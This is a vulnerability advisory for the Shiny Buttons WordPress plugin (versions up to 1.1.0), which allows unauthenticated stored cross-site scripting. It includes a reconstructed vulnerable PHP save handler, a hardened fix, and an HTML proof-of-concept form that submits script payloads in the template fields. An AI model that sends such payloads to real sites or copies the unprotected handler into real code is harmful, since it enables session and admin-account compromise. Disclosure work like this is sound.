WordPress Plugin Vulnerabilities

Shiny Buttons <= 1.1.0 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin performs no authorisation or CSRF check when saving a template (the wpbtn_save_template function is hooked to the init action, so it runs on every request, whether or not a user is logged in), and it neither sanitises the submitted template fields on save nor escapes them when they are output in the admin dashboard. An unauthenticated attacker can therefore add a malicious template whose fields (for example the id and name) are rendered verbatim, leading to Stored Cross-Site Scripting in the browser of any administrator who views the templates.
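The pattern described above, shown as an added illustration rather than the Shiny Buttons plugin's own source: a hypothetical reconstruction of an init-hooked save handler with no capability or nonce check and unescaped output, beside a hardened version. Only wpbtn_save_template, the init hook and the wpbtn_tpl[...]/do request fields come from the advisory; the option name, the render functions, the nonce action and the capability are assumptions.

```php
<?php
// Added example, not the plugin's code. Names other than wpbtn_save_template,
// the `init` hook and the wpbtn_tpl/do POST fields are assumptions.

// --- Vulnerable pattern (hypothetical reconstruction) ---
// Hooked to `init`, so it runs for anonymous front-end requests too; the
// PoC form can POST to any URL on the site and still reach this code.
function wpbtn_save_template_vulnerable() {
	if ( ! isset( $_POST['do'], $_POST['wpbtn_tpl'] ) ) {
		return;
	}
	$templates   = get_option( 'wpbtn_templates', array() ); // option name assumed
	$templates[] = $_POST['wpbtn_tpl'];                       // stored exactly as sent
	update_option( 'wpbtn_templates', $templates );
}
add_action( 'init', 'wpbtn_save_template_vulnerable' );

// Dashboard listing with no escaping: a stored <script> in id or name
// executes for whichever admin opens this page.
function wpbtn_render_templates_vulnerable() {
	foreach ( get_option( 'wpbtn_templates', array() ) as $tpl ) {
		echo '<tr><td>' . $tpl['id'] . '</td><td>' . $tpl['name'] . '</td>'
		   . '<td style="' . $tpl['bg_css'] . '"></td></tr>';
	}
}

// --- Hardened version ---
function wpbtn_save_template_fixed() {
	if ( ! isset( $_POST['do'], $_POST['wpbtn_tpl'] ) ) {
		return;
	}
	// 1. Authorisation: only users who may manage the site can save templates.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
	}
	// 2. CSRF: a nonce tied to this user and action must accompany the POST
	//    (emitted in the admin form by wp_nonce_field, see below).
	check_admin_referer( 'wpbtn_save_template', 'wpbtn_nonce' );

	// 3. Validation on the way in: whitelist the fields and coerce each type.
	$raw = wp_unslash( $_POST['wpbtn_tpl'] );
	$hex = static function ( $v ) {
		return preg_match( '/^[0-9a-fA-F]{6}$/', (string) $v ) ? $v : 'ffffff';
	};
	$tpl = array(
		'id'           => sanitize_key( $raw['id'] ?? '' ),
		'name'         => sanitize_text_field( $raw['name'] ?? '' ),
		'bg_css'       => sanitize_text_field( $raw['bg_css'] ?? '' ),
		'text_color'   => $hex( $raw['text_color'] ?? '' ),
		'font'         => sanitize_text_field( $raw['font'] ?? '' ),
		'font_size'    => absint( $raw['font_size'] ?? 12 ),
		'font_weight'  => in_array( $raw['font_weight'] ?? '', array( 'normal', 'bold' ), true )
			? $raw['font_weight'] : 'normal',
		'border_color' => $hex( $raw['border_color'] ?? '' ),
		'radius'       => absint( $raw['radius'] ?? 0 ),
		'width'        => absint( $raw['width'] ?? 0 ),
	);

	$templates   = get_option( 'wpbtn_templates', array() );
	$templates[] = $tpl;
	update_option( 'wpbtn_templates', $templates );
}
// Handle the save in the admin context only, not on every front-end request.
add_action( 'admin_init', 'wpbtn_save_template_fixed' );

// The admin form that submits to the handler above must carry the nonce.
function wpbtn_template_form_fields_fixed() {
	wp_nonce_field( 'wpbtn_save_template', 'wpbtn_nonce' );
	echo '<input type="text" name="wpbtn_tpl[name]" />';
}

// 4. Escaping on the way out, chosen per context: esc_html for element
//    content, esc_attr for attribute values. Sanitising on save is not a
//    substitute, since older stored rows and other write paths are unknown.
function wpbtn_render_templates_fixed() {
	foreach ( get_option( 'wpbtn_templates', array() ) as $tpl ) {
		echo '<tr><td>' . esc_html( $tpl['id'] ) . '</td><td>' . esc_html( $tpl['name'] ) . '</td>'
		   . '<td style="' . esc_attr( $tpl['bg_css'] ) . '"></td></tr>';
	}
}
```

With the hardened handler, the PoC form below fails twice over: an anonymous visitor does not pass current_user_can, and a logged-in administrator tricked into submitting it fails check_admin_referer because the attacker's page cannot obtain a valid nonce. Escaping at output closes the XSS even for rows that were stored before the fix.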

Proof of Concept

<html>
  <body>
    <!-- The handler is hooked to init, so any URL on the target site works
         as the action: no login, nonce or admin page is required. -->
    <form action="https://example.com/" method="POST">
      <!-- id and name are rendered unescaped in the dashboard -->
      <input type="hidden" name="wpbtn_tpl[id]" value="<script>alert(/XSS-id/)</script>" />
      <input type="hidden" name="wpbtn_tpl[name]" value="<script>alert(/XSS-name/)</script>" />
      <input type="hidden" name="wpbtn_tpl[bg_css]" value="background: #6d0019;background: -moz-linear-gradient(top, #6d0019 0%, #a90329 74%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6d0019), color-stop(74%,#a90329));background: -webkit-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -o-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -ms-linear-gradient(top, #6d0019 0%,#a90329 74%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6d0019', endColorstr='#a90329',GradientType=0 );background: linear-gradient(top, #6d0019 0%,#a90329 74%);" />
      <input type="hidden" name="wpbtn_tpl[text_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[font]" value="Michroma" />
      <input type="hidden" name="wpbtn_tpl[font_size]" value="12" />
      <input type="hidden" name="wpbtn_tpl[font_weight]" value="normal" />
      <input type="hidden" name="wpbtn_tpl[border_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[radius]" value="0" />
      <input type="hidden" name="wpbtn_tpl[width]" value="0" />
      <!-- "do" triggers the save branch of wpbtn_save_template -->
      <input type="hidden" name="do" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

Classification

Type
XSS

Miscellaneous

Original Researcher
Vishal Mohan
Submitter
Vishal Mohan
Verified
Yes

Timeline

Publicly Published
2021-11-15
Added
2021-11-15
Last Updated
2022-04-11